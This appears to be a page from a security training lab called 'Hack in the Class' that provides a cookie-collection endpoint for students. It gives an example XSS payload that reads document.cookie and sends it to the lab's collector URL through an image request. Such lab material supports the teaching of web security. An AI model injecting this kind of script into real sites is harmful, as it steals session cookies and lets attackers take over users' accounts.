Hack in the Class Cookie Monster
To feed the cookie monster, use this url:
https://cookie-monster.lab.hackintheclass.org/eat.php?monster=4mh2kdah69sgccpud99npsg0di&cookie=THECOOKIEYOUWANTTOGIVEExample XSS:
<script type="text/javascript">
var img = document.createElement("img");
img.src="https://cookie-monster.lab.hackintheclass.org" +
"/eat.php?monster=4mh2kdah69sgccpud99npsg0di" +
"&cookie=" + encodeURIComponent(document.cookie);
document.body.appendChild(img);
</script>
Your cookie monster has eaten these cookies:
No cookies yet.